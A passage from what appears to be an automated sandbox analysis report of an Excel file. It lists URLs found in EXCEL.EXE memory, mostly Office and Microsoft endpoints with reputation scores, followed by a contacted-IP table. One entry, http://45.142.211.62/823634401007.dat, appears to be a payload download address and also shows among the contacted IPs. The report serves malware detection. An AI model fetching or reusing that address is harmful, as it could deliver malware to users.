                                                                https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://login.windows.net/commonEXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://outlook.office.com2;EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://store.office.cn/addinstemplateEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook9EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://outlook.office365.com/=EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://api.powerbi.com/v1.0/myorg/groups%EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://api.powerbi.com/v1.0/myorg/groupsBearerEXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                              		high
                                                                              https://substrate.office.comlEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.odwebp.svc.msEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                		high
                                                                                https://web.microsoftstream.com/video/EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                  		high
                                                                                  https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://graph.windows.netEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                    		high
                                                                                    https://login.windows.net/common/oauth2/authorizeXCGhEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://substrate.office.comyEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://api.onedrive.comMBIEXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                          		high
                                                                                          https://substrate.office.comcEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://ncus.contentsync.EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                            		high
                                                                                            http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                              		high
                                                                                              https://management.azure.comwEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://settings.outlook.com&EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://substrate.office.comPEXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                  		high
                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                    		high
                                                                                                    https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://substrate.office.com$;EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      http://45.142.211.62/823634401007.dat2EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickStaEXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://wus2.contentsync.EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://login.windows.net/common/oauth2/authorizexEgjEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://onedrive.live.comedEXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://clients.config.office.net/user/v1.0/ios1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                              		high
                                                                                                              https://webshell.suite.office.comuEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://login.windows.net/common/oauth2/authorizeZEXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeiEtjEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                                    		high
                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize_EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://analysis.windows.net/powerbi/apiQEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://clients.config.office.net/user/v1.0/android/policies1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                                              		high
                                                                                                                              https://graph.windows.net/https://graph.windows.netEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorizenNEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://entitlement.diagnostics.office.comEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                                                                                                            		high

                                                                                                                                            Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            45.142.211.62
